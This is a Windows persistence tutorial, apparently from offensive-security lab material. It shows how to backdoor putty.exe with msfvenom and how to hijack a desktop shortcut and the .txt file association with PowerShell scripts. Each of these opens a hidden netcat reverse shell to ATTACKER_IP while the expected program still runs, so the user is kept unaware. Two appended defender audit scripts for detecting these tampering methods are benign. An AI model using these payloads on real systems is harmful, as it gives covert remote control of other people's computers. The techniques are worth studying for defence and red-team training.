Another method of establishing persistence consists of tampering with files we know the user interacts with regularly. By modifying such files, we can plant backdoors that get executed whenever the user accesses them. Since we don’t want to raise any alerts that could blow our cover, the files we alter must keep working for the user as expected.

While there are many opportunities to plant backdoors, we will check the most commonly used ones.

Executable Files

If you find any executable lying around the desktop, the chances are high that the user runs it frequently. Suppose we find a shortcut to PuTTY lying around. If we check the shortcut’s properties, we can see that it (usually) points to C:\Program Files\PuTTY\putty.exe. From that point, we could download the executable to our attacker’s machine and modify it to run any payload we wanted.

You can easily plant a payload of your preference in any .exe file with msfvenom. The binary will still work as usual (the -k option keeps the original functionality) but will also execute the additional payload silently in an extra thread. To create a backdoored putty.exe, we can use the following command:

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

The resulting puttyX.exe will execute the shell_reverse_tcp payload without the user noticing it. While this method is good enough to establish persistence, let’s look at other, sneakier techniques.

Shortcut Files

If we don’t want to alter the executable, we can always tamper with the shortcut file itself. Instead of pointing directly to the expected executable, we can change it to point to a script that runs a backdoor and then launches the usual program normally.

For this task, let’s check the shortcut to calc on the Administrator’s desktop. If we right-click it and go to Properties, we’ll see where it is pointing:

Before hijacking the shortcut’s target, let’s create a simple PowerShell script in C:\Windows\System32 or any other sneaky location. The script will execute a reverse shell and then run calc.exe from the original location shown in the shortcut’s properties:

# Spawn the reverse shell via nc64.exe without opening a new window
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"

# Then launch the program the user actually expected from its original location
C:\Windows\System32\calc.exe

Finally, we’ll change the shortcut to point to our script. Notice that the shortcut’s icon might be adjusted automatically while doing so. Be sure to point the icon back to the original executable so that no visible change appears to the user. We also want to run our script in a hidden window, for which we’ll add the -WindowStyle hidden option to PowerShell. The final target of the shortcut would be:

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Let’s start an nc listener on our attacker’s machine to receive the reverse shell:

user@AttackBox$ nc -lvp 4445

If you double-click the shortcut, you should get a connection back to your attacker’s machine. Meanwhile, the user gets the calculator they expected. You will probably notice a command prompt flashing up and disappearing immediately on your screen. A regular user will hopefully not pay much attention to that.
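As an added defender-side check that is not part of the original page, the following PowerShell audit resolves every shortcut on the user desktops and reports the tell-tale signs of the executable and shortcut tampering described above: a script host as the target, a script file in the arguments, an icon borrowed from a binary other than the one launched, and a target whose Authenticode signature is no longer valid. The profile layout under C:\Users is an assumption.

```powershell
# Added audit script, not from the original page: resolves every .lnk on the
# user desktops and flags script-host targets, script arguments, borrowed icons
# and modified target binaries. Run from an elevated PowerShell session.
$shell = New-Object -ComObject WScript.Shell
$scriptHosts = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'
$desktops = 'C:\Users\*\Desktop', 'C:\Users\Public\Desktop'   # assumed profile layout

Get-ChildItem -Path $desktops -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    $target = [Environment]::ExpandEnvironmentVariables($lnk.TargetPath)
    $icon = [Environment]::ExpandEnvironmentVariables(($lnk.IconLocation -split ',')[0])
    $findings = @()

    # Shortcut launches an interpreter instead of the program it pretends to be
    if ($scriptHosts -contains [System.IO.Path]::GetFileName($target)) {
        $findings += "target is a script host: $target $($lnk.Arguments)"
    }
    # Arguments hand a script file to that interpreter (e.g. a .ps1 backdoor)
    if ($lnk.Arguments -match '\.(ps1|vbs|js|bat|cmd)\b') {
        $findings += "arguments reference a script: $($lnk.Arguments)"
    }
    # Icon taken from a different binary than the one actually executed
    if ($icon -and $target -and ($icon -ne $target)) {
        $findings += "icon from '$icon' but target is '$target'"
    }
    # Target binary no longer carries a valid publisher signature (patched exe)
    if ($target -and (Test-Path -LiteralPath $target)) {
        $sig = Get-AuthenticodeSignature -FilePath $target
        if ($sig.Status -ne 'Valid') { $findings += "target signature: $($sig.Status)" }
    }

    if ($findings.Count -gt 0) {
        [PSCustomObject]@{ Shortcut = $_.FullName; Target = $target; Findings = ($findings -join '; ') }
    }
}
```

Legitimate shortcuts often use a separate .ico file or point at an unsigned third-party tool, so treat the icon and signature findings as review items rather than verdicts.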

Hijacking File Associations

In addition to persisting through executables or shortcuts, we can hijack any file association to force the operating system to run a shell whenever the user opens a specific file type.

The default operating system file associations are kept inside the registry, where a key is stored for every single file type under HKLM\Software\Classes\. Let’s say we want to check which program is used to open .txt files; we can just go and check the .txt subkey and find which Programmatic ID (ProgID) is associated with it. A ProgID is simply an identifier for a program installed on the system. For .txt files, we will have the following ProgID:

We can then search for a subkey for the corresponding ProgID (also under HKLM\Software\Classes\), in this case txtfile, where we will find a reference to the program in charge of handling .txt files. Most ProgID entries will have a subkey under shell\open\command where the default command to be run for files with that extension is specified:

In this case, when you try to open a .txt file, the system will execute %SystemRoot%\system32\NOTEPAD.EXE %1, where %1 represents the name of the opened file. If we want to hijack this extension, we could replace the command with a script that executes a backdoor and then opens the file as usual. First, let’s create a .ps1 script with the following content and save it to C:\Windows\backdoor2.ps1:

# Spawn the reverse shell via nc64.exe without opening a new window
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
# Open the requested file in Notepad as usual; $args[0] receives the %1 file name
C:\Windows\system32\NOTEPAD.EXE $args[0]

Notice how in PowerShell we have to pass $args[0] to Notepad, as it will contain the name of the file to be opened, as given through %1.

Now let’s change the registry key to run our backdoor script in a hidden window:

Finally, create a listener for your reverse shell and try to open any .txt file on the victim machine (create one if needed). You should receive a reverse shell with the privileges of the user opening the file.
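As an added defender-side check that is not part of the original page, the following PowerShell audit resolves, for a list of extensions, the ProgID and the shell\open\command the operating system will actually run, and flags handlers that invoke a script host or a script file instead of the expected program. It goes beyond the page in one respect: it reads the merged HKCR view (per-user HKCU\Software\Classes entries override the HKLM ones the page describes) and honours Explorer's per-user UserChoice key, since a hijack placed in either location wins over HKLM. The extension list is an assumption.

```powershell
# Added audit script, not from the original page: reports the real handler
# command for each extension and whether it looks like a script-host hijack.
$extensions = '.txt', '.pdf', '.docx', '.jpg'          # assumed list, extend as needed
$scriptPattern = '\b(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?\b|\.(ps1|vbs|js|bat|cmd)\b'

# Returns the (default) value of a registry key, or $null if the key is absent
function Get-RegDefault($path) {
    if (Test-Path -LiteralPath $path) { (Get-ItemProperty -LiteralPath $path).'(default)' }
}

foreach ($ext in $extensions) {
    # Explorer's per-user choice for the extension takes precedence when present
    $userChoice = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$ext\UserChoice"
    $progId = if (Test-Path -LiteralPath $userChoice) { (Get-ItemProperty -LiteralPath $userChoice).ProgId }
    $source = 'UserChoice'
    if (-not $progId) {
        # HKCR merges HKCU\Software\Classes (wins) over HKLM\Software\Classes
        $progId = Get-RegDefault "Registry::HKEY_CLASSES_ROOT\$ext"
        $source = 'Classes'
    }
    if (-not $progId) { continue }

    $command = Get-RegDefault "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command"
    if (-not $command) { continue }
    # A handler defined per user is unusual for system types such as .txt
    $perUser = Test-Path -LiteralPath "HKCU:\Software\Classes\$progId\shell\open\command"

    [PSCustomObject]@{
        Extension    = $ext
        ProgIDSource = $source
        ProgID       = $progId
        Command      = $command
        PerUserKey   = $perUser
        Suspicious   = [bool]($command -match $scriptPattern)
    }
}
```

For .txt the expected output is the txtfile ProgID with the %SystemRoot%\system32\NOTEPAD.EXE %1 command shown above; anything that launches powershell.exe with a .ps1 path, or lives only under HKCU, deserves a closer look.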